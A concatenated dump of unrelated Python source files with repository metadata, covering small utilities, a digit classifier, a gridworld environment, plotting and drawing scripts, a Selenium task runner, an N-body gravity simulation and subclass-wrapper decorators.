print(f'People whose favorite color is {color}:')
for rec in result:
for person in rec.values():
print(person['first_name'], person['last_name'])
log.info("Step 6: Print each person's favorite color(s).")
for first, last in people:
cyph = """
MATCH(p1 {first_name:'%s', last_name:'%s'})
-[:FAVORITE_COLOR]->(colors)
RETURN colors""" % (first, last)
result = session.run(cyph)
print(f"{first}'s favorite color(s):")
for rec in result:
for color in rec.values():
print(color['color'])
| true |
aafb221dfbc826f17b21434092baade151d46494 | Python | thecoulter/ahk | /mymacros.py | UTF-8 | 318 | 3.0625 | 3 | [] | no_license | import tkinter as tk
def getClipboardText():
root = tk.Tk()
# keep the window from showing
root.withdraw()
return root.clipboard_get()
def putClipText():
f = open("extranotes.txt", "a+")
for x in getClipboardText():
f.write(x)
# print (x)
f.close()
putClipText()
| true |
5aab4929e8ab82bc407cba903a600d1dfa5290f8 | Python | sophos-proyectos/DemoAnalisisVisualPython | /cargar_Modelo.py | UTF-8 | 909 | 2.703125 | 3 | [] | no_license |
# Importan librerias
import joblib
from skimage.feature import hog
import numpy as np
import cv2
#Se carga el modelo
eje = joblib.load('Modelo.joblib')
# lee la imagen
im = cv2.imread("2.jpg")
#Escala de grises
im_gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
ret, im_th = cv2.threshold(im_gray, 90, 255, cv2.THRESH_BINARY_INV)
roi = cv2.resize(im_th, (28, 28))#, interpola
#HISTOGRAMA DE GRADIENTES ORIENTADOS
roi_hog_fd = hog(roi, orientations=9, pixels_per_cell=(14, 14), cells_per_block=(1, 1))
#Se predice
nbr = eje.predict(np.array([roi_hog_fd]))
#Se verifica tamaño para posicion de prediccion
height, width, channels = im.shape
#Se escribe la prediccion en la imagen
cv2.putText(im, str(int(nbr[0])), (int(height/4), int(width/2)),cv2.FONT_HERSHEY_DUPLEX, 1, (0, 255, 255), 2)
#Se imprime la imagen
cv2.imshow("imagen_muestra",im)
cv2.waitKey()
| true |
f63b6897b821f8eb5bfe2e5c1635237e1570eeef | Python | supopur/divisibility-of-number | /deviders_of_number.py | UTF-8 | 1,113 | 4 | 4 | [] | no_license | to_devide = input("to devide: ")
#converts to float
to_devide = float(to_devide)
def Get_number(to_devide):
devider = 1
while True:
#devides the input number by the devider float
result = to_devide / devider
#converts the result to string so it can be processed
result = str(result)
#gets the number technicaly string that is after the dot
what_is_after_the_dot = result.partition('.')[2]
#converts it to float
what_is_after_the_dot = float(what_is_after_the_dot)
#prints the result if the number after the dot isn't more than 0
if not what_is_after_the_dot > 0:
print(devider, result)
#else:
#print('This was ejected', result, 'with devider of: ', devider)
#stops the script if the devider is bigger than the actual number we want to devide
#this is done so that we don't have infinite loop that is deviding 10 by 400 :D
if devider > to_devide:
break
devider += 1
Get_number(to_devide)
| true |
3485d55c35625384fa18e714632d1523ee260332 | Python | moming-studio/jupyter-notebook | /06-tf-项目/强化学习/gridworld.py | GB18030 | 1,678 | 2.828125 | 3 | [] | no_license | #
#һ
#ԣhttps://blog.csdn.net/qq_36686996/article/details/79595915
import numpy as np
from gym.envs.toy_text import discrete
#÷
UP = 0
RIGHT = 1
DOWN = 2
LEFT = 3
class GridWorldEnv(discrete.DiscreteEnv):
def __init__(self , shape = [4,4]):
self.shape = shape
self.nS = np.prod(self.shape)
self.nA = 4
Max_y = shape[0]
Max_x = shape[1]
p = {}
grid = np.arange(self.nS).reshape(shape)
it = np.nditer(grid , flags = ['multi_index'])
while not it.finished:
s = it.iterindex
y , x = it.multi_index
p[s] = {a : [] for a in range(self.nA)}
is_done = lambda s :s == 0 or s == (self.nS - 1)
reward = 0.0 if is_done(s) else -1.0
if is_done(s):
p[s][UP] = [(1.0 , s , reward , True)]
p[s][RIGHT] = [(1.0 , s , reward , True)]
p[s][DOWN] = [(1.0 , s , reward , True)]
p[s][LEFT] = [(1.0 , s , reward , True)]
else:
np_UP = s if y == 0 else s - Max_x
np_RIGHT = s if x == (Max_x - 1) else s + 1
np_DOWN = s if y == (Max_y - 1) else s + Max_x
np_LEFT = s if x == 0 else s - 1
p[s][UP] = [(1.0 , np_UP , reward , is_done(np_UP))]
p[s][RIGHT] = [(1.0 , np_RIGHT , reward , is_done(np_RIGHT))]
p[s][DOWN] = [(1.0 , np_DOWN , reward , is_done(np_DOWN))]
p[s][LEFT] = [(1.0 , np_LEFT , reward , is_done(np_LEFT))]
pass
it.iternext()
pass
self.p = p
pass | true |
8a439bafcbdfcea2ba76b1ccbfe99e896b43f571 | Python | DealerSo/Python | /spider_basic/file/fatch_data.py | UTF-8 | 585 | 3.3125 | 3 | [] | no_license | import os
import re
def fatch_data_from_file(file_name):
# 判断文件是否存在
if os.path.exists(file_name):
fos = open(file_name,'r',encoding="utf-8")
# 读取所有行
lines = fos.read()
# 查询所有<loc></loc>
locations = re.findall('<loc>(.*?)</loc>',lines)
# 循环读取每一行
for line in locations:
print(line)
fos.close()
else:
open(file_name, 'a') # 'a'追加,如果文件不存在会创建一个文件
if __name__ == '__main__':
fatch_data_from_file("data.txt") | true |
0adf0cb8da2b42b68a482e96f236a775a8beaf4e | Python | bruffolo/PHYS512 | /Nbody/Orbit.py | UTF-8 | 11,188 | 2.53125 | 3 | [] | no_license | import numpy as np
from numpy.fft import rfftn,irfftn
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import time
import ctypes
from numba import jit
import sys
import os
wd = os.getcwd()
# Pull necessary functions from companion C library
c_lib = ctypes.cdll.LoadLibrary("PM_methods.so")
# Get the methods for the isolated BC's
to_grid = c_lib.to_grid
to_grid.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_long, ctypes.c_long]
handle_isolated_boundaries = c_lib.handle_isolated_boundaries
handle_isolated_boundaries.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_long, ctypes.c_long]
def to_grid_py(xy,grid,cell_loc):
g_xy = np.asarray(np.round(xy),dtype='int')
n = xy.shape[0]
for i in range(n):
grid[g_xy[i,0],g_xy[i,1],g_xy[i,2]] = grid[g_xy[i,0],g_xy[i,1],g_xy[i,2]] + 1
cell_loc[i] = g_xy[i,0],g_xy[i,1],g_xy[i,2]
# System Configuration
npix = 2**6 # Pixel number
npt = 2 # Number of particles
ndim = 3 # Number of dimenesions
# Particle mass parameters
m_equal = True # Set all masses to common value
m_random = False # Set masses of particles randomly
m_max = 1 # Maximum particle mass
m_min = 0.4 # Mininmum particle mass
# Number of iterations
niter = 150000
# Time step
dt = 0.0001
# Check if user wants verbose printing to stdout
try:
if(sys.argv[1] == '-b'): verbose = True
except(IndexError):
verbose = False
# Plotting parameters (during simulation)
show3D = False
nth = 1 # Plot every nth particle on screen
plt_iter = 1 # Plot particles every plt_iter iteration
# Data saving parameters
save_data = True
save_iter = 15 # Save position particle data every save_iter iteration
save_nth = 1 # Save position particle data every save_nth particle
x_file = "x_orbit_long.txt"
y_file = "y_orbit_long.txt"
z_file = "z_orbit_long.txt"
# Benchmark mode
benchmark = False
# Perferably if benchmark = True, you should set niter = 1, otherwise benchmarks will print out every iteration!
# Potential test mode
potential_test = False
########################################
### Green's function ###
########################################
green_func = np.zeros([2*npix+1,2*npix+1,2*npix+1])
# Method to fill the Green's function array
@jit(nopython=True,parallel = True)
def get_H(H):
for i in range(npix+1):
for j in range(npix+1):
for k in range(npix+1):
if(i == 0 and j == 0 and k == 0 ):
# This value describes the strength of the force between particles in the same cell
H[i,j,k] = 4/3 # Chose wisely
else:
H[i,j,k] = 1/np.sqrt(i**2 + j**2 + k**2)
#print("Progress: %.2f %%\r"%((i/npix)*100), end = '')
#print()
for i in range(npix+1):
for j in range(npix+1):
for k in range(npix+1):
h = H[i,j,k]
H[ 2*npix-i , j , k ] = h
H[ 2*npix-i , 2*npix-j , k ] = h
H[ 2*npix-i , j , 2*npix-k ] = h
H[ 2*npix-i , 2*npix-j , 2*npix-k ] = h
H[ i , 2*npix-j , k ] = h
H[ i , 2*npix-j , 2*npix-k ] = h
H[ i , j , 2*npix-k ] = h
#print("Progress: %.2f %%\r"%((i/npix)*100), end = '')
#print()
get_H(green_func) # Make the Green's function array
green_ft = rfftn(green_func[:-1,:-1,:-1]) # Take the FT of Green's function array
#plt.imshow(green_func[:,:,0]);plt.colorbar();plt.show()
grid = np.zeros([2*npix,2*npix,2*npix]) # Make the grid array
########################################
### Particle setup ###
########################################
# Positions
x = np.zeros([npt])
y = np.zeros([npt])
z = np.zeros([npt])
# Masses
if(m_equal):
m = np.ones([npt],dtype=float)*m_max
if(m_random):
m = (np.random.rand(npt)*m_max) + m_min
# Velocities
vx = np.zeros([npt])
vy = np.zeros([npt])
vz = np.zeros([npt])
# Accelerations
ax = np.zeros([npt])
ay = np.zeros([npt])
az = np.zeros([npt])
# Starting positions
x[0] = npix/2
y[0] = npix/2
z[0] = npix/2
m[0] = 100000
x[1] = npix*(7.5/10)
y[1] = npix/2
z[1] = npix/2
vy[1] = np.sqrt(m[0]/(x[1]-x[0]))
'''
x[2] = npix*(1/10)
y[2] = npix/2
z[2] = npix/2
vy[2] = -np.sqrt(m[0]/(x[0]-x[2]))
x[3] = npix*(7.5/10)
y[3] = npix/2
z[3] = npix/1.8
vy[3] = -np.sqrt(m[0]/(x[3]-x[0]))
x[4] = npix*(6.5/10)
y[4] = npix/2
z[4] = npix/2
vy[4] = np.sqrt(m[0]/(x[4]-x[0]))
'''
if(potential_test):
npix = 64
niter = 0
show3D = False
z[:] = npix//2
# Data saving arrays (will be printed to file)
if(save_data):
x_save = np.zeros([niter//save_iter,npt//save_nth])
y_save = x_save.copy()
z_save = x_save.copy()
if(show3D): plt.ion()
# Print statments for user
if(verbose):
print("\nPixel density: %d x %d x %d"%(npix,npix,npix))
print("Number of particles: %d"%npt)
print("Numer of iterations: ",niter)
print("Time step: ",dt)
if(show3D):
print("\n3D Plot parameters:")
print(">Number of plotted particles: %d"%(npt/nth))
print(">Plot refreshed every %dth iteration"%(plt_iter))
if(save_data):
print("\nData save parameters: ")
print(">Positional data of every %dth particle will be saved every %dth iteration"%(save_nth,save_iter))
print(">Data will be saved in files: ",x_file,", ",y_file,", ",z_file)
print()
if(benchmark):
print("\n####### Benchmarks #######")
########################################
### Initializtion ###
########################################
t91 = time.time() # Simulation start time
lx = np.asarray(np.round(x),dtype='int')
ly = np.asarray(np.round(y),dtype='int')
lz = np.asarray(np.round(z),dtype='int')
# This array will track out of bounds particles
bc = np.zeros([npt],dtype = 'int')
# Assign particles to the grid
to_grid(lx.ctypes.data, ly.ctypes.data, lz.ctypes.data, grid.ctypes.data, m.ctypes.data, bc.ctypes.data, npt, npix)
l = np.array([lx,ly,lz])
# Potential calculation
density_ft = rfftn(grid)
potential = irfftn(density_ft*green_ft)
# Acceleration calculation in every grid cell
Fx_prev,Fy_prev,Fz_prev = np.gradient(potential)
ax_prev = Fx_prev[tuple(l)]/m
ay_prev = Fy_prev[tuple(l)]/m
az_prev = Fz_prev[tuple(l)]/m
# Reset grid
grid.fill(0)
if(potential_test):
plt.figure(1)
plt.imshow(potential[:,:,npix//2].T,origin='lower');plt.colorbar()
plt.show()
########################################
### Main Loop ###
########################################
if(show3D):
fig = plt.figure(1)
axs = plt.axes(projection='3d')
axs.set_axis_off()
axs.view_init(45,0 )
for t in range(niter):
t11 = time.time()
lx = np.asarray(np.round(x),dtype='int')
ly = np.asarray(np.round(y),dtype='int')
lz = np.asarray(np.round(z),dtype='int')
# Assign particles to the grid
to_grid(lx.ctypes.data, ly.ctypes.data, lz.ctypes.data, grid.ctypes.data,m.ctypes.data, bc.ctypes.data, npt, npix)
t2 = time.time()
if(benchmark):print("Grid snap calc. time: ",t2-t11)
#-------------------------------------------------------------------------------------------------------------
# Potential Calculation
t1 = time.time()
density_ft = rfftn(grid)
potential = irfftn(density_ft*green_ft)
t2 = time.time()
if(benchmark):print("FFT calc. time: ",t2-t1)
#-------------------------------------------------------------------------------------------------------------
# Force calculation
t1 = time.time()
Fx,Fy,Fz = np.gradient(potential[:npix,:npix,:npix])
t2 = time.time()
if(benchmark):print("Gradient Calc. time: ",t2-t1)
#-------------------------------------------------------------------------------------------------------------
# Integration of particle positions and velocities (LEAPFROG method)
t1 = time.time()
# Update positions
x = x + vx*dt + (1/2)*ax_prev*dt**2
y = y + vy*dt + (1/2)*ay_prev*dt**2
z = z + vz*dt + (1/2)*az_prev*dt**2
# Save the position data
if(t%save_iter == 0):
x_save[t//save_iter] = x[::save_nth].copy()
y_save[t//save_iter] = y[::save_nth].copy()
z_save[t//save_iter] = z[::save_nth].copy()
lx = np.asarray(np.round(x),dtype='int')
ly = np.asarray(np.round(y),dtype='int')
lz = np.asarray(np.round(z),dtype='int')
handle_isolated_boundaries(lx.ctypes.data,ly.ctypes.data,lz.ctypes.data,npt,npix)
l = np.array([lx,ly,lz])
# Compute current acceleration
ax = Fx[tuple(l)]/m
ay = Fy[tuple(l)]/m
az = Fz[tuple(l)]/m
# Handle particles outside the grid >>> they feel no force from the grid bound mass.
bc_flag = bc.astype(bool)
ax[bc_flag] = 0
ay[bc_flag] = 0
az[bc_flag] = 0
# Update velocities
vx = vx + (1/2)*( ax_prev + ax )*dt
vy = vy + (1/2)*( ay_prev + ay )*dt
vz = vz + (1/2)*( az_prev + az )*dt
# Save current forces
ax_prev = ax.copy()
ay_prev = ay.copy()
az_prev = az.copy()
t2 = time.time()
if(benchmark):print("Integration time: ",t2-t1)
else: print("Progress: %.2f %%, Rate: %.3f s/iter, Elasped time: %.2f s \r"%( (t/niter)*100,(t2-t11),(t2-t91) ), end = '')
#-------------------------------------------------------------------------------------------------------------
# Plotting
if(show3D and t%plt_iter == 0):
axs.clear()
axs.set_axis_off()
axs.plot3D(x_save[:t,1],y_save[:t,1],z_save[:t,1])
axs.scatter3D(x_save[t,1],y_save[t,1],z_save[t,1])
'''
axs.scatter3D(x_save[t,2],y_save[t,2],z_save[t,2])
axs.plot3D(x_save[:t,2],y_save[:t,2],z_save[:t,2])
axs.scatter3D(x_save[t,3],y_save[t,3],z_save[t,3])
axs.plot3D(x_save[:t,3],y_save[:t,3],z_save[:t,3])
axs.scatter3D(x_save[t,4],y_save[t,4],z_save[t,4],color = "red")
axs.plot3D(x_save[:t,4],y_save[:t,4],z_save[:t,4],color = "red")
'''
#axs.plot3D(x_save[:t,0],y_save[:t,0],z_save[:t,0])
axs.scatter3D(x_save[t,0],y_save[t,0],z_save[t,0])
axs.set_xlim([0,npix]);axs.set_ylim([0,npix]);axs.set_zlim([0,npix])
plt.pause(0.001)
#-------------------------------------------------------------------------------------------------------------
# Reset the grid
t1 = time.time()
grid.fill(0)
t2 = time.time()
if(benchmark):print("Grid reset time: ",t2-t1)
#-------------------------------------------------------------------------------------------------------------
t99 = time.time(); print("\n\nTotal simulation time: %.2f s"%(t99-t91))
# Save x,y and z data to files
if(save_data):
if(verbose): print("\nSaving Data ...")
np.savetxt(wd+"/Positional_data/"+x_file,x_save,delimiter=",")
np.savetxt(wd+"/Positional_data/"+y_file,y_save,delimiter=",")
np.savetxt(wd+"/Positional_data/"+z_file,z_save,delimiter=",")
if(verbose): print("Save complete!") | true |
a396a33d566263ac7eafd3c088cb3230fce6a796 | Python | ch4rl3salenc/ABS | /CognitiveDecision/CollectiveIntelligence/CollaborativeFiltering/critics.py | UTF-8 | 2,454 | 2.90625 | 3 | [] | no_license | #! python3
# a set of movies rate by different people
from CognitiveDecision.CollectiveIntelligence.CollaborativeFiltering.ranking import *
critics = {
'Lisa Rose': {
'Lady in the Water': 2.5, 'Snakes on a Plane': 3.5,
'Just My Luck': 3.0, 'Superman Returns': 3.5, 'You, Me and Dupree': 2.5, 'The Night Listener': 3.0
},
'Gene Seymour': {
'Lady in the Water': 3.0, 'Snakes on a Plane': 3.5,
'Just My Luck': 1.5, 'Superman Returns': 5.0, 'The Night Listener': 3.0, 'You, Me and Dupree': 3.5
},
'Michael Phillips': {
'Lady in the Water': 2.5, 'Snakes on a Plane': 3.0,
'Superman Returns': 3.5, 'The Night Listener': 4.0
},
'Claudia Puig': {
'Snakes on a Plane': 3.5, 'Just My Luck': 3.0,
'The Night Listener': 4.5, 'Superman Returns': 4.0, 'You, Me and Dupree': 2.5
},
'Mick LaSalle': {
'Lady in the Water': 3.0, 'Snakes on a Plane': 4.0,
'Just My Luck': 2.0, 'Superman Returns': 3.0, 'The Night Listener': 3.0, 'You, Me and Dupree': 2.0
},
'Jack Matthews': {
'Lady in the Water': 3.0, 'Snakes on a Plane': 4.0,
'The Night Listener': 3.0, 'Superman Returns': 5.0, 'You, Me and Dupree': 3.5
},
'Toby': {
'Snakes on a Plane': 4.5, 'You, Me and Dupree': 1.0,
'Superman Returns': 4.0
},
'Chhatra': {
'Harry Potter': 5, 'The Emoji': 5, 'Superman Returns': 4.0, 'You, Me and Dupree': 1.0
},
'Chhorm': {
'Harry Potter': 5, 'The Emoji': 5, 'Hotel Trans.': 2.5, 'Lion king': 5
}
}
# Matching Products
# convert from user => movie to movie => users
# 'Chhatra' : {'The Lion': 3.5 ..} => 'The Lion' : {'Chhatra':3.5..}
def transform_prefs(prefs):
result = {}
for person in prefs:
for item in prefs[person]:
result.setdefault(item, {})
result[item][person] = prefs[person][item]
return result
# matching movie
# to match this use top_matches function()
# e.g.
# movies = transform_prefs(critics)
# top_movies = top_matches(movies, 'Superman Returns')
# convert from user's based into item-based
def calculate_similar_items(prefs, n=10):
result = {}
item_prefs = transform_prefs(prefs)
c = 0 # status
for item in item_prefs:
c += 1
if c % 100 == 0:
print('%d' % (c/len(item_prefs)))
# most similar item to each other
scores = top_matches(item_prefs, item, n=n)
result[item] = scores
return result
| true |
a6eda14f789252e953eb3ca772b362874a2cc4ca | Python | rishikumarr/Python | /Data Science/Seaborn/Regression Plot/RegressionPlot.py | UTF-8 | 1,329 | 2.984375 | 3 | [] | no_license | import seaborn as sns
from matplotlib import pyplot as plt
tips=sns.load_dataset("tips")
# print(tips)
# sns.lmplot(x="total_bill",y="tip",data=tips)
# Adding Hue
# sns.lmplot(x="total_bill",y="tip",data=tips,hue='sex')
# Adding Markers
# sns.lmplot(x="total_bill",y="tip",data=tips,hue='sex',markers=['o','v'])
# Specifying Size To Markers
# sns.lmplot(x="total_bill",y="tip",data=tips,hue='sex',markers=['o','v'],scatter_kws={'s':100})
# Adding column and row
# sns.lmplot(x="total_bill",y="tip",data=tips,col='sex') # Adding Columns
# sns.lmplot(x="total_bill",y="tip",data=tips,row="time") # Adding Rows
# sns.lmplot(x="total_bill",y="tip",data=tips,row="time",col="sex") # Adding Both Rows And Columns
# sns.lmplot(x="total_bill",y="tip",data=tips,row="time",col="sex") # Adding Both Rows And Columns
# Adding hue
# sns.lmplot(x="total_bill",y="tip",data=tips,row="time",col="day",hue="sex")
# sns.lmplot(x="total_bill",y="tip",data=tips,col="day",hue="sex",markers=['o','v'])
# Adding Size To Plot
# sns.lmplot(x="total_bill",y="tip",data=tips,col="day",hue="sex",markers=['o','v'],aspect=0.6,height=8)
plt.show()
| true |
129ab8ecfa0deb344458c9fa24c5f7a052049a58 | Python | HackerSchool-AC/PythonArt | /Code-Beispiele/Beispiele-4/KreisSechseck_1.py | UTF-8 | 690 | 3.515625 | 4 | [] | no_license | from turtle import *
tina = Turtle(shape = "turtle")
# tracer(False)
def maleKreis(radius, farbe):
# Gehe zum Rand
forward(radius)
left(90)
# Male den Kreis
pendown()
pensize(2)
fillcolor(farbe)
begin_fill()
circle(radius)
end_fill()
def maleSechseck(seite, farbe):
# Gehe zum Rand
forward(seite)
left(120)
# Male das Sechseck
pendown()
pensize(2)
fillcolor(farbe)
begin_fill()
for i in range(6):
forward(seite)
left(60)
end_fill()
# Gehe zur Mitte
penup()
goto(0, 0)
maleKreis(300, "red")
# Gehe zur Mitte
penup()
goto(0, 0)
maleSechseck(300, "blue")
Screen().exitonclick()
| true |
6fde82cef390e617af7283ccd0d77bbf7f5c5440 | Python | madeindjs/pomodore_manager | /classes/task.py | UTF-8 | 1,605 | 2.65625 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
from view.writter import Writter
from classes.model import Model
from classes.worktime import WorkTime
class Task(Model):
table_name = 'tasks'
attrs = ['id', 'node_id', 'name', 'description', 'status']
def delete(self):
"""delete task and also subtasks"""
Writter.event('delete task n°{} and subtasks linked'.format(self.id))
try:
data = {'id': self.id , 'node_id': self.id}
sql_query = "DELETE FROM {} WHERE id = :id OR node_id = :node_id".format(self.table_name)
self.database.cursor_execute( sql_query , data )
self.database.connection.commit()
return True
except AttributeError:
print('Object have not id property')
return False
def subtasks(self):
"""return all subtasks linked to this task"""
Writter.event('delete task n°{} and subtasks linked'.format(self.id))
data = { "id" : self.id}
sql_query = "SELECT id FROM tasks WHERE node_id = :id"
result = self.database.cursor_execute( sql_query , data ).fetchall()
for id in result:
yield tasks.append(Task(id[0]))
@property
def worktimes(self):
"""generator wortimes"""
data = { "task_id" : self.id}
sql_query = "SELECT id, task_id FROM worktimes WHERE task_id=:task_id"
result = self.database.cursor_execute( sql_query , data ).fetchall()
for id in result:
yield WorkTime(id=id[0])
@property
def spended_time(self):
"""return the total time spend on this task"""
spended_time = 0
for worktime in self.worktimes:
spended_time += worktime.time
return datetime.timedelta(seconds=spended_time)
| true |
0fa9a7c2839c3e9767a02cee23125d844b690587 | Python | dx2ly/buy_pig_plan_python-1 | /main.py | UTF-8 | 1,490 | 3.03125 | 3 | [
"MIT"
] | permissive | import json
import random
import time
import os
from selenium.webdriver.support.wait import WebDriverWait
from config import settings
from task import single_task
def main():
"""
程序主函数
:return: None
"""
driver = setup_driver()
wait = WebDriverWait(driver, settings['timeout'])
url_list = get_url_list()
count_result = {'success': 0, 'error': 0, 'sum': settings['times']}
for i in range(settings['times']):
url = url_list[random.randint(0, len(url_list) - 1)]
print(f'--------------TASK {i + 1}: {url["name"]} {url["url"]} --------------')
result = single_task(driver, url['url'], wait)
print(result)
count_result[result['status']] += 1
if result['status'] == 'success':
time.sleep(2)
print(f'\n{count_result}')
driver.close()
def setup_driver():
"""
初始化 driver
:return: driver
"""
driver = settings['driver']
driver.set_page_load_timeout(settings['timeout'])
driver.set_script_timeout(settings['timeout'])
driver.set_window_rect(0, 0, 1024, 768)
return driver
def get_url_list():
"""
随机选择一个 json 文件读入
:return: dict 数组,URL 列表
"""
file_list = os.listdir('assets')
filepath = os.path.join('assets', file_list[random.randint(0, len(file_list) - 1)])
with open(filepath) as f:
url_list = json.load(f)
return url_list
if __name__ == '__main__':
main()
| true |
10a9a9c3ff04202d309f8c29255ff6e7a9a4b838 | Python | bourbaki-py/introspection | /bourbaki/introspection/subclassing.py | UTF-8 | 9,442 | 2.734375 | 3 | [
"Apache-2.0"
] | permissive | # coding:utf-8
from types import MethodType
from functools import update_wrapper
from inspect import signature, Signature, Parameter
from .callables import bind_verbosely, validate_overrides, merged_signature
# decorators
def subclass_mutator_method(
wrapped_method_or_class,
call_wrapped_first=True,
call_wrapped_manually=False,
wrapped_is_method=True,
concat_docs=True,
):
"""Decorate e.g. an __init__ for a subclass with @subclass_mutator_method(Superclass), when a new argument is
needed or a prior default value overridden but there is no complex logic required for initialization that involves
a mixture of the arguments from the parent class method and the subclass method.
By default, the parent method is called with the subset of arguments that it accepts, then the new method is called
with all of the arguments. If you wish to call the parent method yourself you may pass the keyword arg
`call_wrapped_manually=True` to the decorator. If the wrapped method is actually a plain function, pass
`wrapped_is_method=False` to the decorator. This prevents the wrapper's first argument (i.e. `self`) from being
passed to the wrapped method, even if its name happens to match that of an argument in the wrapped method.
"""
def dec(wrapper_method):
return SubclassMutatorMethod(
wrapper_method,
wrapped_method_or_class,
call_wrapped_first=call_wrapped_first,
call_wrapped_manually=call_wrapped_manually,
wrapped_is_method=wrapped_is_method,
concat_docs=concat_docs,
)
return dec
subclass_init = subclass_mutator_method
def subclass_method(
wrapped_method_or_class, pass_to_wrapper_as, wrapped_is_method=True
):
def dec(wrapper_method):
return SubclassMethod(
wrapper_method,
wrapped_method_or_class,
pass_to_wrapper_as=pass_to_wrapper_as,
wrapped_is_method=wrapped_is_method,
)
return dec
class _SubclassMethodBase:
new_pos = None
old_pos = None
new_varpos = None
old_varpos = None
new_kw = None
old_kw = None
new_varkw = None
old_varkw = None
wrapped = None
wrapper = None
wrapped_sig = None
wrapper_sig = None
wrapped_is_method = None
__signature__ = None
def __init__(
self, wrapper, wrapped_method_or_class, *, wrapped_is_method, concat_docs=True
):
self.wrapped = get_wrapped_method(wrapper, wrapped_method_or_class)
self.wrapped_sig = signature(self.wrapped)
self.wrapper = wrapper
self.wrapper_sig = signature(wrapper)
self.wrapped_is_method = bool(wrapped_is_method)
wrapper_names, wrapped_names = validate_overrides(
wrapper=self.wrapper_sig,
wrapped=self.wrapped_sig,
wrapper_is_method=True,
wrapped_is_method=wrapped_is_method,
)
self.new_pos, self.new_varpos, self.new_kw, self.new_varkw = wrapper_names
self.old_pos, self.old_varpos, self.old_kw, self.old_varkw = wrapped_names
wrapped, wrapper = self.wrapped, self.wrapper
update_wrapper(
self,
wrapper,
assigned=(
"__name__",
"__qualname__",
"__module__",
"__annotations__",
"__kwdefaults__",
),
updated=(),
)
if concat_docs and (wrapped.__doc__ is not None or wrapper.__doc__ is not None):
self.__doc__ = "\n".join(f.__doc__ for f in (wrapped, wrapper) if f.__doc__)
def get_wrapped_args_kwargs(self, args, kwargs):
bound = bind_verbosely(
self.wrapper_sig, args, kwargs, name=self.wrapper.__qualname__
)
allargs = bound.arguments
new_varpos, new_varkw = (self.new_varpos, self.new_varkw)
varargnames = new_varpos, new_varkw
# self
wrapped_args = [args[0]] if self.wrapped_is_method else []
# wrapped positional args that
wrapped_args.extend(
allargs[k] for k in self.old_pos if k in allargs and k not in varargnames
)
if new_varpos:
wrapped_args.extend(allargs[new_varpos])
wrapped_kwargs = dict(
(k, allargs[k])
for k in self.old_kw
if k in allargs and k not in varargnames
)
if new_varkw is not None:
wrapped_kwargs.update(allargs[new_varkw])
# this will throw a nice error if anything is missing
_ = bind_verbosely(
self.wrapped_sig,
tuple(wrapped_args),
wrapped_kwargs,
name=self.wrapped.__qualname__,
)
return wrapped_args, wrapped_kwargs
def __get__(self, obj, cls):
if obj is not None:
return MethodType(self, obj)
return self
def __call__(self, *args, **kwargs):
pass
class SubclassMutatorMethod(_SubclassMethodBase):
call_wrapped_manually = None
def __init__(
self,
wrapper,
wrapped_method_or_class,
*,
wrapped_is_method=True,
call_wrapped_first=True,
call_wrapped_manually=False,
concat_docs=True
):
super().__init__(
wrapper,
wrapped_method_or_class,
wrapped_is_method=wrapped_is_method,
concat_docs=concat_docs,
)
self.__signature__ = merged_signature(
self.wrapper_sig,
self.wrapped_sig,
wrapper_is_method=True,
wrapped_is_method=wrapped_is_method,
return_arg_names=False,
)
self.call_wrapped_first = bool(call_wrapped_first)
self.call_wrapped_manually = bool(call_wrapped_manually)
def __call__(self, *args, **kwargs):
wrapped_args, wrapped_kwargs = self.get_wrapped_args_kwargs(args, kwargs)
if not self.call_wrapped_manually:
if self.call_wrapped_first:
self.wrapped(*wrapped_args, **wrapped_kwargs)
return self.wrapper(*args, **kwargs)
else:
self.wrapper(*args, **kwargs)
return self.wrapped(*wrapped_args, **wrapped_kwargs)
else:
return self.wrapper(*args, **kwargs)
class SubclassMethod(_SubclassMethodBase):
pass_to_wrapper_as = None
pass_to_wrapper_kind = None
pass_multiple_args = None
def __init__(
self,
wrapper,
wrapped_method_or_class,
*,
wrapped_is_method=True,
pass_to_wrapper_as=None
):
if not isinstance(pass_to_wrapper_as, str):
if not isinstance(pass_to_wrapper_as, tuple) or not all(
isinstance(n, str) for n in pass_to_wrapper_as
):
raise TypeError(
"`pass_to_wrapper_as` must be str or a tuple of str; got {}".format(
repr(pass_to_wrapper_as)
)
)
super().__init__(
wrapper, wrapped_method_or_class, wrapped_is_method=wrapped_is_method
)
pass_multiple = isinstance(pass_to_wrapper_as, tuple)
self.pass_multiple_args = pass_multiple
self.pass_to_wrapper_as = pass_to_wrapper_as
pass_to_wrapper_kind = (
tuple(self.wrapper_sig.parameters[k].kind for k in pass_to_wrapper_as)
if pass_multiple
else self.wrapper_sig.parameters[pass_to_wrapper_as].kind
)
self.pass_to_wrapper_kind = pass_to_wrapper_kind
kinds = pass_to_wrapper_kind if pass_multiple else (pass_to_wrapper_kind,)
if not all(
k in (Parameter.POSITIONAL_OR_KEYWORD, Parameter.KEYWORD_ONLY)
for k in kinds
):
raise TypeError(
"wrapped result is specified to be passed to {}, which is of kind {}; only parameter kinds "
"{} are allowed here".format(
pass_to_wrapper_as,
repr(pass_to_wrapper_kind),
(Parameter.POSITIONAL_OR_KEYWORD, Parameter.KEYWORD_ONLY),
)
)
pass_names = pass_to_wrapper_as if pass_multiple else (pass_to_wrapper_as,)
wrapper_call_sig = Signature(
p for p in self.wrapper_sig.parameters.values() if p.name not in pass_names
)
self.__signature__ = merged_signature(
wrapper_call_sig,
self.wrapped_sig,
wrapper_is_method=True,
wrapped_is_method=wrapped_is_method,
return_arg_names=False,
)
def __call__(self, *args, **kwargs):
wrapped_args, wrapped_kwargs = self.get_wrapped_args_kwargs(args, kwargs)
result = self.wrapped(*wrapped_args, **wrapped_kwargs)
result_arg = self.pass_to_wrapper_as
if not self.pass_multiple_args:
kwargs[result_arg] = result
else:
kwargs.update(zip(result_arg, result))
return self.wrapper(*args, **kwargs)
def get_wrapped_method(wrapper, wrapped_method_or_class):
if isinstance(wrapped_method_or_class, type):
# resolve the method on the parent class
wrapped = getattr(wrapped_method_or_class, wrapper.__name__)
else:
wrapped = wrapped_method_or_class
return wrapped
| true |
